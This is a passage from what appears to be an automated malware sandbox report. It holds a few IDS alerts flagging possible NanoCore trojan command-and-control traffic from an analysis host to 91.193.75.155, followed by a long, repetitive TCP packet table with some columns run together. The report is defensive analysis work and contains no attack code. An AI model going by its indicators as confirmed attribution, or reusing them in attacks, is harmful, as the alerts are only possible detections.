                                                      01/22/21-07:33:03.415066TCP2025019ET TROJAN Possible NanoCore C2 60B497835090192.168.2.491.193.75.155
                                                      01/22/21-07:33:10.340730TCP2025019ET TROJAN Possible NanoCore C2 60B497845090192.168.2.491.193.75.155
                                                      01/22/21-07:33:17.449587TCP2025019ET TROJAN Possible NanoCore C2 60B497855090192.168.2.491.193.75.155
                                                      01/22/21-07:33:24.254331TCP2025019ET TROJAN Possible NanoCore C2 60B497865090192.168.2.491.193.75.155
                                                      01/22/21-07:33:31.359828TCP2025019ET TROJAN Possible NanoCore C2 60B497875090192.168.2.491.193.75.155

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 22, 2021 07:30:20.956803083 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.013168097 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.013232946 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.013360977 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.013421059 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.014260054 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.014326096 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.014359951 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.014389992 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.016556025 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.016612053 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.016670942 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.016699076 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.018930912 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.019045115 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.116935968 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.135690928 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.145804882 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.174531937 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.174561024 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.174685955 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.175635099 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.175720930 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.197650909 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.197694063 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.197871923 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.197925091 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.198873043 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.198899031 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.199003935 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.201628923 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.201677084 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.201725006 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.201759100 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.204328060 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.204370975 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.204435110 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.204461098 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.207010031 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.207043886 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.207102060 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.207128048 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.208759069 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.208794117 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.208839893 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.208884001 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.209450006 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.209716082 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.209759951 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.209803104 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.209829092 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.210047960 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.210091114 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.210115910 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.210144043 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.212443113 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.212486982 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.212543011 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.212560892 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.212590933 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.212629080 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.212651014 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.212696075 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.215147018 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.215195894 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.215233088 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.215244055 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.215260029 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.215308905 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.217942953 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.218010902 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.218050957 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.218101025 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.220582962 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.220626116 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.220695972 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.220732927 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.223262072 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.223306894 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.223351002 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.223386049 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.225946903 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.226032019 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.227494955 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.237905979 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.270323038 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.270376921 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.270437956 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.270474911 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.270895958 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.270937920 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.270975113 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.270996094 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.273289919 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.273345947 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.273397923 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.273418903 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.275707960 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.275753975 CET4434972192.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.275809050 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.275830030 CET49721443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.290046930 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.290093899 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.290226936 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.291373014 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.291450024 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.291500092 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.291594028 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.294080973 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.294099092 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.294159889 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.294184923 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.296741962 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.296760082 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.296822071 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.296849012 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.299493074 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.299516916 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.299582958 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.299613953 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.299737930 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.299757004 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.299809933 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.299841881 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.301047087 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.301065922 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.301109076 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.301135063 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.302165031 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.302182913 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.302238941 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.302269936 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.303538084 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.303559065 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.303708076 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.304869890 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.304889917 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.304934025 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.304960966 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.306041956 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.306099892 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.306118965 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.306165934 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.307581902 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.307600975 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.307634115 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.307656050 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.308641911 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.308665991 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.308701038 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.308725119 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.310331106 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.310355902 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.310420036 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.310554981 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.311167955 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.311192989 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.311228037 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.311268091 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.313016891 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.313050985 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.313095093 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.313121080 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.313702106 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.313724995 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.313766956 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.313792944 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.315712929 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.315737009 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.315783978 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.315803051 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.316257000 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.316318035 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.316335917 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.316389084 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.318430901 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.318506956 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.318511963 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.318564892 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.318811893 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.318842888 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.318922997 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.321161032 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.321219921 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.321254969 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.321293116 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.321400881 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.321429968 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.321531057 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.323910952 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.323942900 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.323982000 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.323985100 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.324019909 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.324038029 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.324054003 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.324126959 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.326530933 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.326564074 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.326603889 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.326622009 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.326633930 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.326638937 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.326668024 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.326689959 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.329096079 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.329135895 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.329179049 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.329201937 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.329266071 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.329345942 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.329348087 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.329408884 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.331590891 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.331633091 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.331693888 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.331716061 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.331964970 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.332006931 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.332051992 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.332072973 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.334131956 CET4434972092.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.334218979 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.334692955 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.334737062 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.334774971 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.334789991 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.337438107 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.337493896 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.337527037 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.337606907 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.340127945 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.340168953 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.340229988 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.340259075 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.342840910 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.342890024 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.342993021 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.344444990 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.351569891 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.351613998 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.351692915 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.352853060 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.352920055 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.352960110 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.352996111 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.353015900 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.355638027 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.355696917 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.355731010 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.355758905 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.358331919 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.358374119 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.358424902 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.358455896 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.361114979 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.361165047 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.361215115 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.361243963 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.363730907 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.363765001 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.363853931 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.366463900 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.366487980 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.366559029 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.366609097 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.369184017 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.369223118 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.369281054 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.369313955 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.371880054 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.371925116 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.371975899 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.372004986 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.374588966 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.374629021 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.374680042 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.374708891 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.377291918 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.377334118 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.377393961 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.377418041 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.380045891 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.380131006 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.380141973 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.380206108 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.382725000 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.382769108 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.382816076 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.382860899 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.385441065 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.385554075 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.574070930 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.581399918 CET49720443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.636101007 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.636178970 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.636245966 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.636293888 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.636399031 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.636439085 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.636470079 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.636502028 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.637463093 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.637505054 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.637551069 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.637581110 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.638372898 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.638451099 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.638468027 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.638521910 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.639345884 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.639413118 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.639436007 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.639482975 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.640393019 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.640431881 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.640464067 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.640511036 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.641426086 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.641465902 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.641503096 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.641540051 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.642374992 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.642417908 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.642447948 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.642472982 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.643388033 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.643429995 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.643464088 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.643486977 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.644397974 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.644438982 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.644474030 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.644503117 CET49718443192.168.2.492.122.145.220
                                                      Jan 22, 2021 07:30:21.645376921 CET4434971892.122.145.220192.168.2.4
                                                      Jan 22, 2021 07:30:21.645437956 CET4434971892.122.145.220192.168.2.4
